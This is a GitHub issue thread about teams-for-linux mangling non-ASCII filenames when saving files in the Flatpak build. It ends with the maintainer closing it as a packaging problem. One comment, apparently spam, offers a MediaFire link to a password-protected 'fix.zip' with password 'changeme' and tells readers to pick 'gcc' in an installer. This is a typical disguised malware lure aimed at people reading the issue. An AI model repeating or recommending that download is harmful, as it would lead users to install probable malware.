### ISSUE TITLE
Character coding mixup in filenames when saving files

### ISSUE THREAD

**Issue by LinAGKar** [IsmaelMartinez/teams-for-linux#1383]
**Describe the bug**
When saving files, it seems to be getting the character coding wrong, interpreting UTF-8 filenames as latin-1. At least in DMs, I don't see the same issue in team channels. This does not happen when using Teams in Firefox.

**To Reproduce**
1. Send a file in a conversation, with a file name that contains a non-ASCII character
2. Click the three dots and choose to download the file
3. File has messed up filename. E.g. "ä" becomes "Ã¤"

**Expected behavior**
File is saved with the correct filename

**Screenshots**
![Screenshot_20240828_112228](https://github.com/user-attachments/assets/fda09ea3-df5a-4438-8497-3158a976bef6)

**Desktop (please complete the following information):**
 - Operating System: openSUSE Leap 15.6
- KDE Plasma Version: 5.27.11
- KDE Frameworks Version: 5.115.0
- Qt Version: 5.15.12
- Kernel Version: 6.4.0-150600.23.17-default (64-bit)
- Graphics Platform: X11
- Processors: 16 × AMD Ryzen 7 1700X Eight-Core Processor
- Memory: 62.7 Gibyte of RAM
- Graphics Processor: AMD Radeon RX 6500 XT
 - Installation package: Flatpak
 - Version: 1.9.2

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by IsmaelMartinez** [comment]
Hi @LinAGKar, to discount a flatpak configuration, can you try one of our other packaging options? 

https://github.com/IsmaelMartinez/teams-for-linux/releases

It does look similar to https://github.com/IsmaelMartinez/teams-for-linux/issues/1196 . See if some of the suggestions there works for you. Hopefully they do.

**Comment by LinusKardellInfobric** [comment]
I do not get the same issue with the AppImage

**Comment by LinAGKar** [comment]
I do not get the same issue with the AppImage

**Comment by IsmaelMartinez** [comment]
that means you got an issue with the flatpak configuration. I would recommend using another packaging system, or checking in the flathub/flatpak community to see if they can help.

**Comment by IsmaelMartinez** [comment]
I will close this as it is a flatpak issue and I think there is little we can do from our side (I think). 

This is to try to keep the backlog manageable, and because there is a workaround (not use flatpak)
